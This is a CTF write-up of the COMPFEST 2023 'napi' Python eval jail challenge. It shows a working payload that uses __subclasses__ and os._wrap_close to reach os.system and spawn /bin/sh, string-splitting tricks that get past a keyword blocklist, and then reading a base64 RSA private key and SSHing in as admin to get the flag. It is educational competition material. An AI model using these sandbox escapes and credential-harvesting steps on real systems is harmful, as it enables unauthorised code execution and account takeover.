COMPFEST CTF 2023 - napi
Description
Category: Misc
john is currently planning an escape from jail. Fortunately, he got a snippet of the jail source code from his cellmate. Can you help john to escape?
nc 34.101.68.243 10008Author: k3ng
Attachments:
Resolution
1. Overview
The challenge is a classic Python eval jail with no restriction on input lenght but has some banned keywords.
1
banned = ['eval', 'exec', 'import', 'open', 'system', 'globals', 'os', 'password', 'admin', 'pop', 'clear', 'remove']
__builtins__.__import__ has been deleted so we can use it to import module.
2. Escape the jail
Let’s print all submclasses we can access from ():
1
2
john > print(().__class__.__base__.__subclasses__())
[<class 'type'>, <class 'weakref'>, ..., <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>]
There is <class 'os._wrap_close'> which allows us to access os.system and execute commands.
1
2
3
4
5
# Retrieve os._wrap_close
[x for x in ().__class__.__base__.__subclasses__() if 'wrap_clo'+'se' in str(x)][0].__init__.__getattribute__('__glob'+'als__')['sys'+'tem']('/bin/sh')
# Run /bin/sh
[x for x in ().__class__.__base__.__subclasses__() if 'wrap_clo'+'se' in str(x)][0].__init__.__getattribute__('__glob'+'als__')['sys'+'tem']('/bin/sh')
By the way, this is how I bypassed the banned keywords:
- the word is a string: split it (
'system' -> 'sys'+'tem) - the word is a method: use
__getattribute__(x.system -> x.__getattribute__('sys'+'tem'))
Now we have access to a shell, let’s gather some info:
1
2
3
4
5
6
7
8
9
10
11
ls -la
total 44
drwx------ 1 ctf ctf 4096 Sep 9 23:20 .
drwxr-xr-x 1 root root 4096 Sep 9 01:59 ..
-rw-r--r-- 1 ctf ctf 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 ctf ctf 3771 Apr 4 2018 .bashrc
-rw-r--r-- 1 ctf ctf 807 Apr 4 2018 .profile
-rw-r--r-- 1 ctf ctf 1378 Sep 9 23:16 chall.py
-rw-r--r-- 1 root root 2270 Sep 9 23:20 creds.txt
-rw-r--r-- 1 ctf ctf 336 Sep 9 01:54 notice.txt
-rwxr-xr-x 1 ctf ctf 87 Sep 9 01:54 start.sh
1
2
3
4
5
6
7
cat notice.txt
--- IMPORTANT NOTICE ---
Dear admins, I have received information that a prisoner is trying to get access to the flag.
I have moved the flag somewhere safe.
I would advise you not to access the flag right now.
But if there is an urgent matter, login to admin@THIS_SERVER_IP:10009 with your password as the SSH key to access the flag.
According to the notice, we can access to the flag by accessing remotely using SSH to admin@THIS_SERVER_IP:10009.
The SSH key is stored in creds.txt and is base64 encoded.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
cat creds.txt
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBM0R3QW1nU1Na
aENMcldNRzhNS2FCZXlOUWZQNHQyWWRlNnNTak9aMm14Ulc1ZkFhCnExYTVIZGx5QkVsNDZxdC9S
VGpBWVhkeHhEcGlaTDkwOUhIejU3MjZLRGtkbWhFNHZ4eUpFYitES2NSSG9sTlEKc21DT2N3MFps
TUFxNUxXSjMzeGVyejRYWFpvWVFtNVNpUjF5ZytKQytZdHVWZktJdzdWbUhzUzJkM3ZSVWtEQwp0
NUs5YllpVFhZUk1RbmNBZTNObnNJd3ZQYUdHVE1GUUM4TDdIb3dNRzRJR0Q3WFo3a05vdHBDYlpQ
dG5Lc2h5CnQyaU5EVjFMQkVQVUlkL0VOWnNlVHQxYU4zN3dXVi9uZEJvcCtqK0wzUmlpWlgwK0ZS
SVpJOS9EcGNhMjJRME0KK0YybkIwcUl2QVRDSkxRaHZzdTBmR0ZKRGkwVWpyV1g1RHNjWFFJREFR
QUJBb0lCQVFEV2VLQmxYUHBzNXNQLwpjQ1o4SkNiMmllenVRM2I4c3pjWERmd2N0dnJkL3lxNDll
QWk1MnVUQkFVaTQ2SWJkak9VNTdXQnRWNVhLRHhWCnZKVmF6L1lrd2dFZDFyRmJMbFpDMXJrdFRZ
R2dGUU5sc3hrcy9SYjhOOCtucXBTYThhZDR1cGRDdFlidm9uYnAKaXFKWjRSRjZHY2Y3V0t0MGk2
SmdaTEUwV1lFUVRQZU5KTDZmRnBITkdUekFiU2RaYjlWZVgrUk82YWdYOURiZwphaTdyNEhSUmZp
WStxazJaaDVGNFNnY0pFM0pZQS9DUXAzNHpVRWZvZ1VsdzdqWW1VRThNUklURzdzK013cHFnClJ0
QTdzSVdJNEdQVW5zVWwyQVhiZ2NpbThOMUlKOHBwUWFxa0g2TXpjQk9uY2U5VjdrQnpDaThYWkRW
WFpzc2MKSG1qQWx4V0pBb0dCQU80aXZUbmxNRTQ4ZUV3RWtoQWljUDBmMVBEbVQ1bi9mNkdOYTl1
ZU5OUGlDc0RqckJmbApBUG1nNHBRajdlMmpnazI3TXVCSGVaM3Y3K1JoR1hpY25TeHpaU0hTcHNS
dWNLWVdSSVN5UFBnN0ZuYkdERzR6CkVSbFdoeVVYb3QyQ3pYZGE3aEZvcklZbisvWE00N0RYS0ZK
N2xyaDgxV0ZxM1lGei9OODBkK3hyQW9HQkFPekIKZW9TdzVRU1p2QXVHd3hTakRCTWpEb0E2b1I5
aFpiSGVEQWQ4RmhFRjFNUmNHakw3bm5FWStISmVBK010c1dHdQp0QjRZTE9LdFhlMFZHWWZIREp6
OG81MXdaZVFIV1RSME5ydFdieW5Vdzg1T0hFUDNZN3ExRDlXUmNUcEZRYllYCkgwdkMzWGh1ZDgz
a1dVMEZnL1JKMEplMmg3MENTVlRLbXN0eVhreFhBb0dBUEFmajNkbHA0UDhiY0VaaXI5Q08KM1RD
T0ZLQnFocTdDOU8zYXQ4VmRHZURNeHkxZHI3UmFGNU80S3BJWUk2VHBiMEQycFZVL1VsSXZEa3B3
Q2xpbwp3cERnZUxOS3VSQUNNOHcvUDVoVENGeVU0Q0l5OWdESG1iU1hZd0ZmWENuaU0rbG5SRm8z
eTZYK3ZVc0dSd2ttCk1Belp4TzRyT0dDaE1FWVdCQXFOQkxzQ2dZRUFuWmdNWGRjQ0d4WGFQakh1
R1FhUE93M1MwVGcxbUJYVkE1aXkKbVNqWDUyemlPL0t5M2N6dm9vamtsL3hNeWlQWU54VjdmNnpI
OC90QzBsV0JNUWdtTlRsV0Q2NkpwRWZmOFRLSwpYQmtrMWN0eXF4a0RaNXA5SUFMMkQwdEkrMml1
WE83M1BnN3dMUUliYlVuYXg1SXNTNmYyMllYK3hLbUk5cEFHCmlmWVBIdkVDZ1lCUFJYZmFXRjl4
MnFnaDlIU1g5KytyVWQraHBKSE5zOXpsekgvbnFXa2Z3b2cyWWZseE9QdXgKWnBqN2ZtU09iTGpF
b0J3aHJrc3IwUlFIUXEvbHVhNlozbTRhKy9PajkyK3JHdmRBQjNheHhJQnZxOUM3RDgxYQptRDN4
WGFrUmlCVHFVM0VYL0U1cktvaklyTHhhWGNnUzM2bTFuNm1tc3hqVlUvKzRUejcxTEE9PQotLS0t
LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=
Once decoded:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3DwAmgSSZhCLrWMG8MKaBeyNQfP4t2Yde6sSjOZ2mxRW5fAa
q1a5HdlyBEl46qt/RTjAYXdxxDpiZL909HHz5726KDkdmhE4vxyJEb+DKcRHolNQ
smCOcw0ZlMAq5LWJ33xerz4XXZoYQm5SiR1yg+JC+YtuVfKIw7VmHsS2d3vRUkDC
t5K9bYiTXYRMQncAe3NnsIwvPaGGTMFQC8L7HowMG4IGD7XZ7kNotpCbZPtnKshy
t2iNDV1LBEPUId/ENZseTt1aN37wWV/ndBop+j+L3RiiZX0+FRIZI9/Dpca22Q0M
+F2nB0qIvATCJLQhvsu0fGFJDi0UjrWX5DscXQIDAQABAoIBAQDWeKBlXPps5sP/
cCZ8JCb2iezuQ3b8szcXDfwctvrd/yq49eAi52uTBAUi46IbdjOU57WBtV5XKDxV
vJVaz/YkwgEd1rFbLlZC1rktTYGgFQNlsxks/Rb8N8+nqpSa8ad4updCtYbvonbp
iqJZ4RF6Gcf7WKt0i6JgZLE0WYEQTPeNJL6fFpHNGTzAbSdZb9VeX+RO6agX9Dbg
ai7r4HRRfiY+qk2Zh5F4SgcJE3JYA/CQp34zUEfogUlw7jYmUE8MRITG7s+Mwpqg
RtA7sIWI4GPUnsUl2AXbgcim8N1IJ8ppQaqkH6MzcBOnce9V7kBzCi8XZDVXZssc
HmjAlxWJAoGBAO4ivTnlME48eEwEkhAicP0f1PDmT5n/f6GNa9ueNNPiCsDjrBfl
APmg4pQj7e2jgk27MuBHeZ3v7+RhGXicnSxzZSHSpsRucKYWRISyPPg7FnbGDG4z
ERlWhyUXot2CzXda7hForIYn+/XM47DXKFJ7lrh81WFq3YFz/N80d+xrAoGBAOzB
eoSw5QSZvAuGwxSjDBMjDoA6oR9hZbHeDAd8FhEF1MRcGjL7nnEY+HJeA+MtsWGu
tB4YLOKtXe0VGYfHDJz8o51wZeQHWTR0NrtWbynUw85OHEP3Y7q1D9WRcTpFQbYX
H0vC3Xhud83kWU0Fg/RJ0Je2h70CSVTKmstyXkxXAoGAPAfj3dlp4P8bcEZir9CO
3TCOFKBqhq7C9O3at8VdGeDMxy1dr7RaF5O4KpIYI6Tpb0D2pVU/UlIvDkpwClio
wpDgeLNKuRACM8w/P5hTCFyU4CIy9gDHmbSXYwFfXCniM+lnRFo3y6X+vUsGRwkm
MAzZxO4rOGChMEYWBAqNBLsCgYEAnZgMXdcCGxXaPjHuGQaPOw3S0Tg1mBXVA5iy
mSjX52ziO/Ky3czvoojkl/xMyiPYNxV7f6zH8/tC0lWBMQgmNTlWD66JpEff8TKK
XBkk1ctyqxkDZ5p9IAL2D0tI+2iuXO73Pg7wLQIbbUnax5IsS6f22YX+xKmI9pAG
ifYPHvECgYBPRXfaWF9x2qgh9HSX9++rUd+hpJHNs9zlzH/nqWkfwog2YflxOPux
Zpj7fmSObLjEoBwhrksr0RQHQq/lua6Z3m4a+/Oj92+rGvdAB3axxIBvq9C7D81a
mD3xXakRiBTqU3EX/E5rKojIrLxaXcgS36m1n6mmsxjVU/+4Tz71LA==
-----END RSA PRIVATE KEY-----
Now we can connect to the server and get the flag:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ ssh admin@34.101.68.243 -p 10009 -i key
Welcome to PRISON ADMINISTRATOR SHELL
Last login: Mon Sep 11 13:21:55 2023 from 87.247.121.172
$ ls -la
total 36
drwxr-xr-x 1 admin admin 4096 Sep 10 23:56 .
drwxr-xr-x 1 root root 4096 Sep 9 01:59 ..
-rw-r--r-- 1 admin admin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 admin admin 3771 Apr 4 2018 .bashrc
drwx------ 2 admin admin 4096 Sep 10 23:56 .cache
-rw-r--r-- 1 admin admin 807 Apr 4 2018 .profile
drwx------ 2 admin admin 4096 Sep 9 23:20 .ssh
-rw-r--r-- 1 root root 38 Sep 9 23:16 flag.txt
$ cat flag.txt
COMPFEST15{j0hN_1s_a_mF_G_49e65c3afb}
COMPFEST15{j0hN_1s_a_mF_G_49e65c3afb}
This post is licensed under
CC BY 4.0
by the author.